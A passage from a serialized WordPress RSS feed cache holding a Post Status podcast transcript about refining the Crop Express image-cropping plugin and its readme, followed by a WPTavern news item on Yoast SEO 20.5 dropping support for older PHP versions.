know, in the classic consulting bible, I think it&#8217;s Alan Weiss, he talks about the job of a consultant is to improve the client&#8217;s condition. Mm-hmm. In some way. Mm-hmm. And I&#8217;ve been doing a lot of thoughts about consulting cause I&#8217;ve tried it a couple of times and, uh, have failed miserably at it.<br /></p>\n\n\n\n<p>But, uh, I&#8217;m still trying. And, but from the. From that consulting thing. If you think about that just for a second, you&#8217;re like, how do I help improve the client&#8217;s condition, or in this case, our potential customer&#8217;s condition? And I think we&#8217;ve done a lot of that work in Crop Express is precisely thinking about the outcome they&#8217;re wanting.[00:18:00]&nbsp;<br /></p>\n\n\n\n<p>And, uh, I&#8217;ll save the rest for our, for our next conversation. But, um, so I. Anything you learned, and I know we still need to do the readme, but, um, anything takeaways from what we&#8217;ve done so far? Other takeaways?<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> I, in a, to be honest, I do think that we have, I&#8217;m thinking out loud here, so I, I, I reserve the right to take all of this back. Um, but at least some. The process that we&#8217;re going through, have gone through is the same, uh, falls in the same trap in that I do think that we have, we know there&#8217;s a problem. We, we&#8217;ve had the problem.<br /></p>\n\n\n\n<p>We don&#8217;t like how, um, propping and inserting images into WordPress currently [00:19:00] works. Um, we. Got excited and said, okay, there&#8217;s something here. We both felt, you know, felt it in our gut, but then as we got into it, there&#8217;s definitely been, I don&#8217;t, it&#8217;s not like I expect, you know, a million news, a million installs overnight.<br /></p>\n\n\n\n<p>Um, but there&#8217;s, there&#8217;s something, I don&#8217;t know what we could have done differently, but they&#8217;re, I haven&#8217;t felt. The spark didn&#8217;t ignite, I guess is what I&#8217;m, kinda what I would say. It&#8217;s like there&#8217;s something here. We&#8217;ve built a nice little utility. I almost, it almost feels like we&#8217;ve kind of, uh, you know, we, we saw a sparkle of something on the ground.<br /></p>\n\n\n\n<p>We started digging. There might have been a couple of other glimmers of like, oh, there&#8217;s a, maybe a li a hint of gold. It kept us digging, but I kind of feel like we&#8217;ve reached a point where, You know, we&#8217;ve dug around, we&#8217;ve dug up all the earth around what we thought might have been a vein of gold and said, okay, [00:20:00] yeah, no, I guess there&#8217;s nothing here.<br /></p>\n\n\n\n<p>Um, and not that that isn&#8217;t part of the process. Um, I don&#8217;t know what we could have done differently. I, I only question if there was a way to have arrived there sooner. Um, mm-hmm. And again, none of this is to say that I don&#8217;t think that what we&#8217;ve created has value. Um, and we kept sort of going, okay, well let&#8217;s, you know, we keep having really good high level conversations, which again, has led to other ideas.<br /></p>\n\n\n\n<p>Um, and so that&#8217;s, that&#8217;s not invaluable. Um, but we were sort of like, take a step forward and see, take a step forward and see. And now that we&#8217;re ready to kind of put a bow on version one, it&#8217;s like, yeah, this might be. You know, which is okay. Um, but it&#8217;s very, it&#8217;s, it&#8217;s a, it&#8217;s definitely a little hard to accept.<br /></p>\n\n\n\n<p>Do you know what I mean? Like just [00:21:00] the sunk cost fallacy or whatever it is. Like you Yeah. We&#8217;ve put in time and effort and, and so much thinking that we, we, part of me still really wants it to be something more than what it may. You know, and I know, and this, this conversation may be just as in, um, as premature as, uh, as what I&#8217;m alluding to, right.<br /></p>\n\n\n\n<p>Of like, early on we were very optimistic that we would find something bigger down the road anyway. So I have a thought&nbsp;<br /></p>\n\n\n\n<p><strong>Cory Miller:</strong> I, on that thought. I have, I have a thought for when we go to the next conversation. Hmm. Um, how we could maybe approach that even better.&nbsp;<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> But I guess I like what I do like is the meta, um, the meta of you and I recording all of these conversations.<br /></p>\n\n\n\n<p>Right. And I think, like, I remember one, one of the, a a, a mental image, but a [00:22:00] conversation, a memory that, that often pops into my head is when I still worked at we. Um, yes, the one that&#8217;s in the documentary, you can see my bald spot in, in the back of some of the shots, um, where they talk about, you know, the demise of, of WeWork.<br /></p>\n\n\n\n<p>Um, so yeah, I&#8217;m, I&#8217;m WeWork famous. Um, but, uh, at the time I sat at the table with, uh, five other entrepreneurs, everybody pursuing different projects and it was great because it was an an instant mastermind and very frequently we. Just say, Hey, could I, you know, buy you lunch and, and pick your brain about such and such?<br /></p>\n\n\n\n<p>And I remember a buddy of mine, Joel, coming to a real crossroads in, uh, in product and in business. Um, and again, him saying, Hey, could I just, could we take a walk? I&#8217;m like, you know, vexed about this and [00:23:00] we. Uh, in soho and we walked over to the river and just like standing at the railing and looking at, um, what, what would it have been, um, the Hudson River and looking over to New Jersey and him talking.<br /></p>\n\n\n\n<p>And there was this moment of me just feeling very, this is, this is feeling very grown up and very, like, we were having important conversations and, um, You know, and it, it felt great that I hopefully was helping him work through some problems and stuff. But, um, anyway, uh, the value in that experience, that camaraderie and, and then ultimately, like there were other conversations where he helped me just as much as maybe I helped him.<br /></p>\n\n\n\n<p>Um, but I&#8217;m hoping that at a high level, even though you and I like session seven, whatever this is, we, we are where we are. It is where it isn&#8217;t, where we expect it to. We are going to continue, but I&#8217;m, I&#8217;m hoping that people watching this are having some of that same, like, [00:24:00] oh, other people have these, these thoughts or go around in these circles or, you know, ramble to themselves just like I do&nbsp;<br /></p>\n\n\n\n<p><strong>Cory Miller:</strong> now.<br /></p>\n\n\n\n<p>I, I think so many times, uh, I&#8217;m not just, I don&#8217;t wake up born with a gift of know. What the pro products are. Um, I&#8217;ve gotta figure it out.&nbsp;<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> Ands am working with you, man. I know. I, I was counting on million dollar idea overnight, the magic.&nbsp;<br /></p>\n\n\n\n<p><strong>Cory Miller:</strong> Um, you know, and uh, so I&#8217;ve done a lot of thinking about products for the last 15 years, obviously, and gone.<br /></p>\n\n\n\n<p>Okay. You get, so I think we&#8217;re pulling together some components, comparing experiences too, and. Plowing the new head forward. Um, so yeah, I mean, the camaraderie&#8217;s been amazing. I do it just for that. But second is I think we&#8217;re building some experience about what products work, what, what products don&#8217;t. I, I think there&#8217;s a tendency for me is think [00:25:00] people do have magic and just know it, but there&#8217;s, there&#8217;s, there&#8217;s a lot of things that go into that.<br /></p>\n\n\n\n<p>Yeah. And there&#8217;s a lot of. Professionally about this particular topic, but there&#8217;s a reason why comp big companies buy smaller companies because they found the magic and they were pulled in, you know, kind of thing. Um, at least that&#8217;s how I think about it in my humility.&nbsp;<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> Well, and so I, in the last few years have learned to make things around my house.<br /></p>\n\n\n\n<p>I. My carpentry skills are getting better. I&#8217;m not good. But, uh, I have now, you know, built a big roof over my patio. I&#8217;ve built shelves, I&#8217;ve, you know, um, helped my father-in-law fix his roof, stuff like that. Um, and I&#8217;m, I&#8217;ve definitely had the experience where I&#8217;m, I&#8217;m working generally with people who know what they&#8217;re.<br /></p>\n\n\n\n<p>But not always. [00:26:00] Uh, I have, I can always jump on YouTube and, and Google things. Um, but I definitely felt the, so a little, a little insight to me like. Years and years ago, I was an artistic genius. Um, in my own mind, absolutely. Like I was, uh, a musician. I still am. I was starting to build product. I still do, but at the time I was convi, utterly convinced that I&#8217;m very smart and I will, I can, I can figure out magic, um, and, uh, an aspect.<br /></p>\n\n\n\n<p>Turning middle-aged or whatever it is, is like, I&#8217;m just another human. And yes, I might do some amazing things. Um, but most humans in one sense or another, do some amazing things. Um, but everybody also, everybody has to start from somewhere. And a lot of the times it&#8217;s a group of people. And so, uh, going back to like learning how to repair or I, I got to be, [00:27:00] I was, uh, helped a bunch of people literally build a house in a.<br /></p>\n\n\n\n<p>And it was one of the most amazing experiences of my life. And the, the, the, in the crew, it was a dad and some son, his sons all work construction, all build houses, so they know how to knock together, literally knock together a house in a day. And I had no idea how to knock together a house in a day. Um, And so they are amazing at what they do now from experience, and they are smart people.<br /></p>\n\n\n\n<p>Um, and then that gets shared with the rest of us. There&#8217;s this trickle down, and I&#8217;m not saying I could go build a house in a day, but at least I have some sense of how it is done. And so this summer when I build a shed, I might be able to build a shed with a couple of other people in a couple of days.<br /></p>\n\n\n\n<p>You know what I mean? Mm-hmm. Um, and so there&#8217;s, there&#8217;s definitely. You know, we, we always talk about the Steve [00:28:00] Jobs or the whoever, um, you know, the artistic geniuses. The, the people who can snap their fingers and, and creativity comes out, and then the rest of us have to work at it, you know? And, and that&#8217;s okay.<br /></p>\n\n\n\n<p>And it&#8217;s, it&#8217;s a little bit of luck and it&#8217;s a little bit of timing and it&#8217;s a little bit of the people around you, and it&#8217;s a little bit of the industry you&#8217;re in. And then it&#8217;s the practice that you&#8217;ve done. And you and I have both been thinking about product for, you know, 15 years or whatever it is.<br /></p>\n\n\n\n<p>And so I&#8217;m walking around, I&#8217;m in San Francisco this week, so I&#8217;m walking around in San Francisco thinking, The amount of, you know, tech and, and whatnot that&#8217;s here. Um, but what it really comes down to is like, I was driving on the highway last night. Judging harshly, all of the ridiculous billboards, because I&#8217;m like, who is Twilio think they&#8217;re advertising to?<br /></p>\n\n\n\n<p>Or who is, um, who else did we see monday.com? And I&#8217;m not necessarily picking on their billboards. They&#8217;re fine. But it&#8217;s like, [00:29:00] okay, th this is, these, these is, this isn&#8217;t, that&#8217;s most of these products I don&#8217;t think. Attributable to one person&#8217;s genius. These are products that were built by teams and companies that were built up over time.<br /></p>\n\n\n\n<p>And then there&#8217;s a marketing team, and now I&#8217;m questioning some of the marketing decisions, but I&#8217;m like, who are they marketing to? You know? And how does that differ from like the online billboards ads and such that I&#8217;m seeing when I&#8217;m in New Hampshire versus in. You know, I&#8217;m, I&#8217;m essentially in Silicon Valley, you know, so it&#8217;s, uh, humbling, right?<br /></p>\n\n\n\n<p>I mean, they&#8217;re exp spending tens of thousands on billboards that I think are not very good. Um, but at the same time, they&#8217;ve arrived there over time, you know? And did it start with conversations like this? Did it, you know, who was the team involved? Who were the people involved? What were their experience?<br /></p>\n\n\n\n<p>I think that&#8217;s all fascinating. I wish most [00:30:00] companies. There was just a, a thread on Hacker News. Um, was it Hack News or Reddit? Like what are your favorite postmortems? Um, and it&#8217;s, I, I like the people on that thread were wishing that they were more write-ups of, um, You know, there&#8217;s probably a little bit of morbid curiosity, um, but also like, you know, what are the lessons we can learn, but also a, a lot of it&#8217;s just the stories are fascinating.<br /></p>\n\n\n\n<p>There&#8217;s a reason why there&#8217;s 101 podcasts interviewing founders, many of whom haven&#8217;t reached the success that most of us would, would want, themselves included. Um, but the stories are fascinating, you know.&nbsp;<br /></p>\n\n\n\n<p><strong>Cory Miller:</strong> Yeah, it, it, I&#8217;ve, I read the founders at workbook and it was really cool, but, and a lot of it is serendipity.<br /></p>\n\n\n\n<p>Yeah. And it&#8217;s like, I was gonna use a band analogy cuz of your music background [00:31:00] and just go like, you know, how does. Um, I know some mu musicians and I&#8217;m like, one pretty dang popular in the nineties, eighties and nineties. Mm-hmm. And, uh, spent some time with him. Really great guy, but I was like, I always wanna go.<br /></p>\n\n\n\n<p>How did the, like he&#8217;s played with that, his band for, you know, A long time and they&#8217;ve had success together and it&#8217;s like, how do you, how does that come together? Is always the magic for me. And then how do they make this great music that a lot of the best bands I&#8217;ve heard, you know, they need, like Dave Matthews was the continuum.<br /></p>\n\n\n\n<p>You&#8217;re like, man, great voice. But I&#8217;ve also heard like he wouldn&#8217;t be Dave Matthews and Dave Matthews band without all the incredible musicians around him. He happens to get the names stands,<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> the connections he had and stuff like that.&nbsp;<br /></p>\n\n\n\n<p><strong>Cory Miller:</strong> Yeah, that was very much, iThemes , by the way, I got way more credit and I can&#8217;t sing so[00:32:00]&nbsp;<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> well. But um, yeah, and I think that, thank you. I think you&#8217;ve sort of. In some ways summarized what, what I, my rambling was trying to get at is the, it&#8217;s everything is the sum of its parts, right? And so it&#8217;s like, there was a point where I thought that I would snap my fingers, um, and not that I didn&#8217;t work really, really hard, um, but I now understand that it&#8217;s so much more as the building blocks, the sum of the building blocks, um, and the culmination of things.<br /></p>\n\n\n\n<p>And like a lot of bands, you know, I love, in fact, I&#8217;m, I&#8217;m rereading Elton John&#8217;s book. Um, great read by the way. I&#8217;m not a fan of Elton John. I, when I read it the first time, I went back and literally tried to listen to some of his music and I couldn&#8217;t get through most of it. It&#8217;s just so not to my taste.<br /></p>\n\n\n\n<p>Um, I&#8217;m wrong. Don&#8217;t, there? There is no question that I am, I am wrong. Literally, [00:33:00] billions of people love his music and I don&#8217;t, so I am wrong here. But the book is really fun. Um, well written self effacing. Self self deprecating. Um, and, and I&#8217;m a music history nerd. Um, but it&#8217;s the, you know how things came.<br /></p>\n\n\n\n<p>Um, you know, and he definitely is magical, musically. Um, but he, he watch the past tense of grind grounded. He, he worked really, really hard for a really long time and with a lot of people, and people came and went and stuff like that, you know, so at some point you and I are. Reach a a point where you&#8217;re gonna fire me and hire somebody better and keep going with the band.<br /></p>\n\n\n\n<p>Um, and I will be the pee best. Um, you know, the long lost drummer, original drummer of the Beatles, um, who will die in obscurity. [00:34:00] And I accept,&nbsp;<br /></p>\n\n\n\n<p><strong>Cory Miller:</strong> I don&#8217;t think so, cuz you, you, you forget. I don&#8217;t know how to sing and it&#8217;s not gonna be as fun at all without the drums and guitar solo and everything you&#8217;ve done so.<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> But anyway, why don&#8217;t, why don&#8217;t you share your screen if you have the, the read me. I think, I feel like the brainstorming we did last time worked well. Like you were typing, typing, typing, um, while we were both chatting, if that works. Yep. So we&#8217;re here.<br /></p>\n\n\n\n<p>Nice. Oh, so there&#8217;s an edit option. That&#8217;s cool. Uh, bottom left, there&#8217;s a button that&#8217;s an edit. Can we make our changes right in it? Cool.<br /></p>\n\n\n\n<p><strong>Cory Miller:</strong> You know what, we&#8217;ll wanna go back when we do the, the new brand that we talked about, we&#8217;ll wanna come back and put the links here.&nbsp;<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> Oh, for sure. [00:35:00] Okay,<br /></p>\n\n\n\n<p>so I go to, we&#8217;re press. Slash plugins<br /></p>\n\n\n\n<p>and I search for crop<br /></p>\n\n\n\n<p>and I&#8217;m seeing what else comes up. And like there&#8217;s a, yeah, image aspect ratio. Custom fields for, um, a ACF crop and image as keywords. Um, I also heard from, I did a, um, a call with um, Matt Cromwell and, um, I hate to say it, but Leslie Pizza, um, cuz I can never remember her last name and I think she actually, like a lot of people call her Leslie Pizza.<br /></p>\n\n\n\n<p>Um, But, uh, they were helping me [00:36:00] review one of my other plugins and said that we can actually have up to 12 keywords. Uh, just the first, I think, five show up. So, uh, I was actually misinformed that, or I, under, I had the wrong knowledge that, uh, I thought we could only have a few keywords. So, um, I think on that, on that first screen, Plug in maybe.<br /></p>\n\n\n\n<p>Yeah, I saw tags. So, um,<br /></p>\n\n\n\n<p>like I&#8217;m, I&#8217;m wondering if, I mean this is, and this is all always speculation, but is, is it better to have image crop or is it better to just have crop? To me, you don&#8217;t crop, you don&#8217;t crop anything that isn&#8217;t an image. So I, it might ju we might, image, crop might be. Cropping is good though.[00:37:00]&nbsp;<br /></p>\n\n\n\n<p><strong>Cory Miller:</strong> So I had crop and cropping. Since we can add more tags, that&#8217;s good knowledge,&nbsp;<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> right?<br /></p>\n\n\n\n<p>In WordPress, uh, featured images are often called thumbnails.<br /></p>\n\n\n\n<p>Um, oh, media library. Now that we have that, it&#8217;s probably, you know, if people are looking for ways that they are manipulating images in the media library, maybe they search for media library.<br /></p>\n\n\n\n<p>Um, I can&#8217;t imagine that people are looking for the term aspect. Um,<br /></p>\n\n\n\n<p>More likely they&#8217;re looking for, oh, image size, right? Like we had the, the guy message me and say, I need, you know, I need [00:38:00] all images, need to ultimately be 700 by 500 or whatever it was, like image size. Um, so anyway, I feel like that flushes it out a lot more. Okay.&nbsp;<br /></p>\n\n\n\n<p><strong>Cory Miller:</strong> Yeah, that&#8217;s awesome. I mean, that&#8217;s really good base level things.<br /></p>\n\n\n\n<p>We gotta just check the box for. Uh, do I push saver update code? I&#8217;m always the Control s. Control s. Command desk. Command desk, right.&nbsp;<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> Um, I probably save, I I imagine that Save actually does both. I just remember that Save took a long time. Okay.&nbsp;<br /></p>\n\n\n\n<p><strong>Cory Miller:</strong> Um. Okay. I put cropping here and I put precise. I took out feature damages, but is there anything else you see that we should probably like a list of features maybe[00:39:00]&nbsp;<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> I. So up to 150 characters, um, I&#8217;m still looking at the description first. Um, it seems like, uh, do you have a, something that&#8217;ll tell us how many characters we&#8217;re using there? Go stick it in a fake tweet or something though. So I guess they just give you. A counter,<br /></p>\n\n\n\n<p>I think like, so I do, I [00:40:00] think we could just say crop images in WordPress Z or is that a sentence? It&#8217;s awesome. I think that&#8217;s really good. WordPress easily, but I, I guess my point is I, we&#8217;re not using 150 characters. Let&#8217;s, let&#8217;s add more words. Um, and WordPress easier. Dash featured image media library.<br /></p>\n\n\n\n<p>You know, it&#8217;s a little bit of, um, keyword.<br /></p>\n\n\n\n<p>I mean, we had the block too. Mm-hmm. Prop images and WordPress.[00:41:00]&nbsp;<br /></p>\n\n\n\n<p>Uh,<br /></p>\n\n\n\n<p>say Guttenberg block,<br /></p>\n\n\n\n<p>like, um, image crop or guttenberg block. I just always feel like we need, I, I&#8217;m not convinced that people. Only at like truly think of it, it&#8217;s just the block editor. Do you know what I mean? Yeah.<br /></p>\n\n\n\n<p>[00:42:00] Yeah, that&#8217;s.<br /></p>\n\n\n\n<p><strong>Cory Miller:</strong> Probably have all these memorized, but I was gonna go back into the plugin. So we have mm-hmm. Go ahead.&nbsp;<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> Um, just the, that we can, um, keyword stuff, the title too. So going back to the plugin tab, crop express,<br /></p>\n\n\n\n<p>crop express, four featured images or, um,<br /></p>\n\n\n\n<p>I&#8217;m just trying to think of what the key, what the keywords might be like. Hmm. [00:43:00] I don&#8217;t think we need WordPress.<br /></p>\n\n\n\n<p><strong>Cory Miller:</strong> Yeah, I was trying to say something like car is a,<br /></p>\n\n\n\n<p>it keeps it native, I guess. Like you don&#8217;t have to go outside of WordPress. There&#8217;s a better term for that, I&#8217;m sure.&nbsp;<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> Right, but I guess this, this is more like, this is more search rankings. I literally think repeating Crop Express for featured images for media library for Gutenberg block. Um,<br /></p>\n\n\n\n<p>yeah, I think, I think that that&#8217;s, to me, that&#8217;s what, what the purpose would be. It&#8217;s, it doesn&#8217;t hurt, like those are human readable words, but I do think it helps the seo.<br /></p>\n\n\n\n<p>Okay. [00:44:00] And I put block, I don&#8217;t know how long this can be, right? Uh, I mean, short pixels is pretty long. Say what?<br /></p>\n\n\n\n<p>I am, I&#8217;m comparing other ones in the repo and like short, short pixel image optimizer Dash Optimize Image is Convert WebP and a V I f. Like they&#8217;re, they&#8217;re, the title of theirs is 66 characters, so I feel like we&#8217;re, we&#8217;ve got room to play with.[00:45:00]&nbsp;<br /></p>\n\n\n\n<p>Uh, the sentence above, you can take out featured images, so crop express speeds up your content workflow. Uh, giving you uniform images for your blog post. I think you can take out featured because we now have expanded, but I still love this intro. Um, so even the title at the top, make cropping featured images you can take out featured.<br /></p>\n\n\n\n<p>So making<br /></p>\n\n\n\n<p>that what you meant right here. Yeah, and, and again, that I think that could be similar to the short description. So rather than make cropping images, we could just say crop images easier.<br /></p>\n\n\n\n<p>Yep. I think it&#8217;s bad English, [00:46:00] but I think it.<br /></p>\n\n\n\n<p>But I think, yeah, we define the problem, we define the high level solution well, and then talk about features, which is the formula you&#8217;re kind of supposed to follow. Mm-hmm.<br /></p>\n\n\n\n<p>Nice.<br /></p>\n\n\n\n<p>And I would even add another one, uh, below that first one you just said. Say, um, something like, uh, round avatar images or something like that. Like shapes is shapes and down the road we can add [00:47:00] stars and rainbows and unicorns if we want. But you know, I still think that it&#8217;s pretty amazing that you can crop a circle.<br /></p>\n\n\n\n<p>Uh, yeah, there you go.<br /></p>\n\n\n\n<p><strong>Cory Miller:</strong> Love it<br /></p>\n\n\n\n<p>and the set sizing defaults give. I don&#8217;t know if guardrails communicate cross cultures, but um, to me it&#8217;s like put those Boeing bumpers on your client, right? From like doing crappy stuff. So giving some, you&#8217;re kind of making it easier on your client by giving them some base. You&#8217;re, you&#8217;re actually taking out the [00:48:00] possibility of error on the client you deliver work for by giving them some.<br /></p>\n\n\n\n<p>So keep them for,&nbsp;<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> um, Prevent uploading the wrong,<br /></p>\n\n\n\n<p>wrong image, like it&#8217;s really wrong size and shape image, but that&#8217;s really wordy.<br /></p>\n\n\n\n<p>Huge images that slow down your site. There you go. Nice.<br /></p>\n\n\n\n<p>Yep.<br /></p>\n\n\n\n<p>Um, you could also, uh, another, you another new under the, the second item is, um, media library.[00:49:00]&nbsp;<br /></p>\n\n\n\n<p><strong>Cory Miller:</strong> Just throw things out just to get us going.&nbsp;<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> Absolutely.<br /></p>\n\n\n\n<p>Yeah, we&#8217;ve got, at this point we&#8217;ve got the three integration points, featured images, media library, and Gutenberg block. Um, and then we&#8217;ve got settings.<br /></p>\n\n\n\n<p>[00:50:00] Settings.&nbsp;<br /></p>\n\n\n\n<p><strong>Cory Miller:</strong> Got the block you said, I&#8217;m sorry. Feature damage image and then the standalone block? Mm-hmm. Okay.<br /></p>\n\n\n\n<p>I&#8217;m just testing that. I don&#8217;t know if it works. [00:51:00] I almost feel like putting this above here and then, you know, new, like the first one is the block. Yep. That&#8217;s cool. It&#8217;s in post copy images by sizes set. Image<br /></p>\n\n\n\n<p>three, need it. Let&#8217;s see. I almost feel like this needs to be, I don&#8217;t know. I don&#8217;t want to nitpick it too much. Image sizing.<br /></p>\n\n\n\n<p>Okay. Anything I missed?&nbsp;<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> No, I think this is a great next version. Okay.&nbsp;<br /></p>\n\n\n\n<p><strong>Cory Miller:</strong> Save it. Mm-hmm.[00:52:00]&nbsp;<br /></p>\n\n\n\n<p>Can you do custom ratios? Mm-hmm.<br /></p>\n\n\n\n<p>Where already said that. See, so it&#8217;s really a square circle or&nbsp;<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> you&#8217;re accustom, right? I I feel like, I mean, it&#8217;s circle, circle or anything else. So, um, pick the most pocket aspect ratios or create your own. Crop a circle if you want to kind of thing. Yeah, I mean they&#8217;re, cuz they&#8217;re all,[00:53:00]&nbsp;<br /></p>\n\n\n\n<p>yeah, I think that&#8217;s great. You&#8217;re done. Okay.<br /></p>\n\n\n\n<p>Now do you just need this? Yeah, so if you&#8217;ve hit update code and it updated, uh, cuz I&#8217;m not seeing our new tags in there, so I don&#8217;t think we&#8217;ve updated. Oh. Update code. There we go. There we go. Yeah. So send that to me and I&#8217;ll, I&#8217;ll drop it in. Cool.<br /></p>\n\n\n\n<p>Done. Great. Um, so I actually need to bounce. Okay. Um, But yeah, you send that to me. Uh, we&#8217;ll plug that in. I&#8217;ll upload it later today. And then, um, again, I I, there&#8217;s a little bit of a long tail, there&#8217;s a couple more the settings that we wanted to add and [00:54:00] stuff like that, but, um, you know, let&#8217;s, again, I&#8217;m, I&#8217;m excited to kind of let it, let it simmer for a while.<br /></p>\n\n\n\n<p>Yeah.&nbsp;<br /></p>\n\n\n\n<p><strong>Cory Miller:</strong> Okay. Sounds good to me. I&#8217;m gonna put some notes about the next topic. In chat, um, just so that We&#8217;ll, they&#8217;ll be there and I won&#8217;t lose them.&nbsp;<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> Yeah, yeah. I&#8217;m sorry. I&#8217;ve, I&#8217;m, yeah, no problem. I&#8217;m getting lost, but, um, yeah, we could also, let&#8217;s, you know, let&#8217;s schedule a call, uh, tomorrow, Friday, too. Okay.<br /></p>\n\n\n\n<p>Sounds&nbsp;<br /></p>\n\n\n\n<p><strong>Cory Miller:</strong> good, man. Enjoy San Francisco.&nbsp;<br /></p>\n\n\n\n<p><strong>Corey Maass:</strong> Thank you. Thanks man.</p>\n\n\n\n<h2 class=\"wp-block-heading\"><br /></h2>\n<p>This article was published at Post Status — the community for WordPress professionals.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 13 Apr 2023 02:13:35 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Cory Miller\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"WPTavern: Yoast SEO 20.5 Drops Support for PHP 5.6, 7.0, and 7.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=143580\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"https://wptavern.com/yoast-seo-20-5-drops-support-for-php-5-6-7-0-and-7-1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2178:\"<p><a href=\"https://yoast.com/yoast-seo-april-11-2023\">Yoast SEO 20.5</a> was released this week with several security fixes and an improved Google SERP preview. The preview shows mobile and desktop snippets with Google&#8217;s current styling so users can see exactly how their snippets will look and tweak how they optimize them for Google Search results.</p>\n\n\n\n<img />\n\n\n\n<p>Another highlight of this release is that Yoast SEO has dropped compatibility with PHP 5.6, 7.0 and 7.1. The plugin now requires PHP 7.2.5 or higher (along with WP 6.0). While this may seem extreme at first glance, approximately 89.9% of WordPress sites are running on PHP 7.2+. WordPress doesn&#8217;t cross-reference these stats with WP version numbers, but it&#8217;s possible sites running on much older versions of WordPress are also on unsupported versions of PHP.</p>\n\n\n\n<img />WordPress <a href=\"https://wordpress.org/about/stats/\">PHP Version Stats</a> &#8211; 4/11/2023\n\n\n\n<p>Getting WordPress sites to update to the latest versions of PHP is a slow-moving process, but historically Yoast SEO has been a force for change in pushing users to upgrade their PHP versions. In version 4.5, released in 2017, <a href=\"https://wptavern.com/yoast-seo-4-5-urges-users-to-upgrade-to-php-7\">Yoast SEO threw the weight of its estimated 6.5 million user base behind the movement to push hosts to upgrade their customers to PHP 7</a>. That version of the plugin introduced a large, non-dismissible notice urging site administrators to upgrade to PHP 7.</p>\n\n\n\n<p>“To move the web forward, we need to take a stand against old, slow, and unsafe software,&#8221; Yoast founder Joost de Valk said at that time. “Because web hosts are not upgrading PHP, we have decided to start pushing this from within plugins.&#8221; He contended that the WordPress ecosystem was losing good developers because the project was moving too slowly and also made the case for security and speed.</p>\n\n\n\n<p>Although the latest version 20.5 will be incompatible with approximately 10% of WordPress sites running unsupported versions of PHP, this move forward is necessary for maintaining a healthy and secure ecosystem. </p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 13 Apr 2023 00:54:23 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"WPTavern: WordPress Gears Up for 2nd Women and Nonbinary Release 